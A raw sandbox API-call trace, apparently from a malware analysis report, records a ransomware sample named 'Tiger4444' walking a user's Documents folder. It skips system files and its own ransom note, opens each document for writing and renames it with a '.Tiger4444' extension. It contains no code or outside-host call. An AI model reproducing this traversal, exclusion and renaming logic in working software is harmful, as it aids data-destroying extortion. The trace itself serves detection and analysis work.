lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.088] lstrlenW (lpString=".lnk") returned 4 [0047.088] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0047.088] lstrlenW (lpString=".ini") returned 4 [0047.088] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0047.088] lstrlenW (lpString=".sys") returned 4 [0047.088] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0047.088] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-0K PhNNHHadw-4-e.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-0k phnnhhadw-4-e.ppt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.088] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.088] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13854158371) returned 1 [0047.089] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=54093) returned 1 [0047.089] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0047.089] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0047.089] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd650, lpName=0x0) returned 0x2c8 [0047.089] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd650) returned 0xbe0000 [0047.091] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.091] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0047.091] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.091] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.091] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.091] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.091] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.091] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0047.091] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13854421013) returned 1 [0047.091] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0047.091] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0047.091] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.092] CloseHandle (hObject=0x2c8) returned 1 [0047.092] CloseHandle (hObject=0x260) returned 1 [0047.093] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-0K PhNNHHadw-4-e.ppt.Tiger4444") returned 74 [0047.093] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-0K PhNNHHadw-4-e.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-0k phnnhhadw-4-e.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-0K PhNNHHadw-4-e.ppt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-0k phnnhhadw-4-e.ppt.tiger4444"), dwFlags=0x1) returned 1 [0047.094] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=54096 | out: Addend=0xc6f980) returned 22004240 [0047.094] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4842 [0047.094] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92c64a60, ftCreationTime.dwHighDateTime=0x1d4d212, ftLastAccessTime.dwLowDateTime=0x4954e750, ftLastAccessTime.dwHighDateTime=0x1d4ca5c, ftLastWriteTime.dwLowDateTime=0x4954e750, ftLastWriteTime.dwHighDateTime=0x1d4ca5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-plMuAf", cAlternateFileName="")) returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="Tiger4444.exe") returned -1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2=".") returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="..") returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="windows") returned -1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="bootmgr") returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="pagefile.sys") returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="boot") returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="ids.txt") returned 1 [0047.094] lstrcmpiW (lpString1="-plMuAf", lpString2="NTUSER.DAT") returned 1 [0047.094] lstrcpyW (in: lpString1=0x30aeafe, lpString2="-plMuAf" | out: lpString1="-plMuAf") returned="-plMuAf" [0047.094] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0047.094] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x66) returned 0xc60fe8 [0047.094] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66308 [0047.094] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x80fa9d6b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x80fa9d6b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80fcfe88, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.094] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.094] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.094] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73e1420, ftCreationTime.dwHighDateTime=0x1d4d2a6, ftLastAccessTime.dwLowDateTime=0xcdb6d510, ftLastAccessTime.dwHighDateTime=0x1d4d12a, ftLastWriteTime.dwLowDateTime=0xcdb6d510, ftLastWriteTime.dwHighDateTime=0x1d4d12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8IgFx4zl3bMpZVF MD", cAlternateFileName="8IGFX4~1")) returned 1 [0047.094] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.094] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.094] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="Tiger4444.exe") returned -1 [0047.094] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2=".") returned 1 [0047.094] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="..") returned 1 [0047.095] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="windows") returned -1 [0047.095] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="bootmgr") returned -1 [0047.095] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="pagefile.sys") returned -1 [0047.095] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="boot") returned -1 [0047.095] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="ids.txt") returned -1 [0047.095] lstrcmpiW (lpString1="8IgFx4zl3bMpZVF MD", lpString2="NTUSER.DAT") returned -1 [0047.095] lstrcpyW (in: lpString1=0x30aeafe, lpString2="8IgFx4zl3bMpZVF MD" | out: lpString1="8IgFx4zl3bMpZVF MD") returned="8IgFx4zl3bMpZVF MD" [0047.095] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0047.095] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7c) returned 0xc71d08 [0047.095] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66528 [0047.095] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58749930, ftCreationTime.dwHighDateTime=0x1d4d275, ftLastAccessTime.dwLowDateTime=0x8fa46e60, ftLastAccessTime.dwHighDateTime=0x1d4cf48, ftLastWriteTime.dwLowDateTime=0x8fa46e60, ftLastWriteTime.dwHighDateTime=0x1d4cf48, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B5abvTlhU7kaxv-9", cAlternateFileName="B5ABVT~1")) returned 1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="Tiger4444.exe") returned -1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2=".") returned 1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="..") returned 1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="windows") returned -1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="bootmgr") returned -1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="pagefile.sys") returned -1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="boot") returned -1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="ids.txt") returned -1 [0047.095] lstrcmpiW (lpString1="B5abvTlhU7kaxv-9", lpString2="NTUSER.DAT") returned -1 [0047.095] lstrcpyW (in: lpString1=0x30aeafe, lpString2="B5abvTlhU7kaxv-9" | out: lpString1="B5abvTlhU7kaxv-9") returned="B5abvTlhU7kaxv-9" [0047.095] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666a0 [0047.095] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x78) returned 0xc83c90 [0047.095] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666a8 | out: ListHead=0xc66828, ListEntry=0xc666a8) returned 0xc66668 [0047.095] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd92be3c0, ftCreationTime.dwHighDateTime=0x1d4d217, ftLastAccessTime.dwLowDateTime=0x26ac28f0, ftLastAccessTime.dwHighDateTime=0x1d4c7b2, ftLastWriteTime.dwLowDateTime=0x26ac28f0, ftLastWriteTime.dwHighDateTime=0x1d4c7b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bO1p3mfPqljshov1", cAlternateFileName="BO1P3M~1")) returned 1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="Tiger4444.exe") returned -1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2=".") returned 1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="..") returned 1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="windows") returned -1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="bootmgr") returned -1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="pagefile.sys") returned -1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="boot") returned -1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="ids.txt") returned -1 [0047.095] lstrcmpiW (lpString1="bO1p3mfPqljshov1", lpString2="NTUSER.DAT") returned -1 [0047.095] lstrcpyW (in: lpString1=0x30aeafe, lpString2="bO1p3mfPqljshov1" | out: lpString1="bO1p3mfPqljshov1") returned="bO1p3mfPqljshov1" [0047.095] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0047.095] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x78) returned 0xc83510 [0047.096] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc666a8 [0047.096] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc6747f0, ftCreationTime.dwHighDateTime=0x1d4cb7b, ftLastAccessTime.dwLowDateTime=0x66235e90, ftLastAccessTime.dwHighDateTime=0x1d4d01d, ftLastWriteTime.dwLowDateTime=0x66235e90, ftLastWriteTime.dwHighDateTime=0x1d4d01d, nFileSizeHigh=0x0, nFileSizeLow=0x5e2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CDDkVk.rtf", cAlternateFileName="")) returned 1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="Tiger4444.exe") returned -1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2=".") returned 1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="..") returned 1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="windows") returned -1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="bootmgr") returned 1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="pagefile.sys") returned -1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="boot") returned 1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="ids.txt") returned -1 [0047.096] lstrcmpiW (lpString1="CDDkVk.rtf", lpString2="NTUSER.DAT") returned -1 [0047.096] lstrcpyW (in: lpString1=0x30aeafe, lpString2="CDDkVk.rtf" | out: lpString1="CDDkVk.rtf") returned="CDDkVk.rtf" [0047.096] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\CDDkVk.rtf", dwFileAttributes=0x0) returned 1 [0047.096] lstrlenW (lpString="CDDkVk.rtf") returned 10 [0047.096] lstrlenW (lpString="Tiger4444") returned 9 [0047.096] lstrcmpiW (lpString1="DDkVk.rtf", lpString2="Tiger4444") returned -1 [0047.096] lstrlenW (lpString=".dll") returned 4 [0047.096] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0047.096] lstrlenW (lpString=".lnk") returned 4 [0047.096] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0047.096] lstrlenW (lpString=".ini") returned 4 [0047.096] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0047.096] lstrlenW (lpString=".sys") returned 4 [0047.096] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0047.096] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\CDDkVk.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\cddkvk.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.097] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.097] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13854972660) returned 1 [0047.097] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=24109) returned 1 [0047.097] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0047.097] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0047.097] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6130, lpName=0x0) returned 0x2c8 [0047.097] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6130) returned 0xbe0000 [0047.098] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.098] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0047.098] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.098] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0047.098] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.098] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0047.098] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.098] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0047.098] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13855147097) returned 1 [0047.098] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0047.098] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0047.098] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.099] CloseHandle (hObject=0x2c8) returned 1 [0047.099] CloseHandle (hObject=0x260) returned 1 [0047.101] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\CDDkVk.rtf.Tiger4444") returned 63 [0047.101] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\CDDkVk.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\cddkvk.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\CDDkVk.rtf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\cddkvk.rtf.tiger4444"), dwFlags=0x1) returned 1 [0047.102] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=24112 | out: Addend=0xc6f980) returned 22058336 [0047.102] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4844 [0047.102] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebe9d4f0, ftCreationTime.dwHighDateTime=0x1d4ce51, ftLastAccessTime.dwLowDateTime=0x507d0e00, ftLastAccessTime.dwHighDateTime=0x1d4cbe1, ftLastWriteTime.dwLowDateTime=0x507d0e00, ftLastWriteTime.dwHighDateTime=0x1d4cbe1, nFileSizeHigh=0x0, nFileSizeLow=0x106b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jMF5ZBp2kKj.odt", cAlternateFileName="JMF5ZB~1.ODT")) returned 1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="Tiger4444.exe") returned -1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2=".") returned 1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="..") returned 1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="windows") returned -1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="bootmgr") returned 1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="pagefile.sys") returned -1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="boot") returned 1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="ids.txt") returned 1 [0047.102] lstrcmpiW (lpString1="jMF5ZBp2kKj.odt", lpString2="NTUSER.DAT") returned -1 [0047.102] lstrcpyW (in: lpString1=0x30aeafe, lpString2="jMF5ZBp2kKj.odt" | out: lpString1="jMF5ZBp2kKj.odt") returned="jMF5ZBp2kKj.odt" [0047.102] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\jMF5ZBp2kKj.odt", dwFileAttributes=0x0) returned 1 [0047.102] lstrlenW (lpString="jMF5ZBp2kKj.odt") returned 15 [0047.102] lstrlenW (lpString="Tiger4444") returned 9 [0047.102] lstrcmpiW (lpString1="p2kKj.odt", lpString2="Tiger4444") returned -1 [0047.102] lstrlenW (lpString=".dll") returned 4 [0047.102] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0047.102] lstrlenW (lpString=".lnk") returned 4 [0047.102] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0047.102] lstrlenW (lpString=".ini") returned 4 [0047.102] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0047.102] lstrlenW (lpString=".sys") returned 4 [0047.102] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0047.102] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\jMF5ZBp2kKj.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\jmf5zbp2kkj.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.103] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.103] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13855565953) returned 1 [0047.103] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=67252) returned 1 [0047.103] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0047.103] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0047.103] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x109c0, lpName=0x0) returned 0x2c8 [0047.103] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x109c0) returned 0xbe0000 [0047.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0047.104] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0047.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0047.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0047.105] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13855828332) returned 1 [0047.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0047.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0047.105] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.106] CloseHandle (hObject=0x2c8) returned 1 [0047.106] CloseHandle (hObject=0x260) returned 1 [0047.106] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\jMF5ZBp2kKj.odt.Tiger4444") returned 68 [0047.106] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\jMF5ZBp2kKj.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\jmf5zbp2kkj.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\jMF5ZBp2kKj.odt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\jmf5zbp2kkj.odt.tiger4444"), dwFlags=0x1) returned 1 [0047.107] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=67264 | out: Addend=0xc6f980) returned 22082448 [0047.107] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4845 [0047.107] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad89f50, ftCreationTime.dwHighDateTime=0x1d4ce19, ftLastAccessTime.dwLowDateTime=0xa6ae00, ftLastAccessTime.dwHighDateTime=0x1d4d11c, ftLastWriteTime.dwLowDateTime=0xa6ae00, ftLastWriteTime.dwHighDateTime=0x1d4d11c, nFileSizeHigh=0x0, nFileSizeLow=0x2c46, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TKlqgRD9 Nr6 m.pps", cAlternateFileName="TKLQGR~1.PPS")) returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="Tiger4444.exe") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2=".") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="..") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="windows") 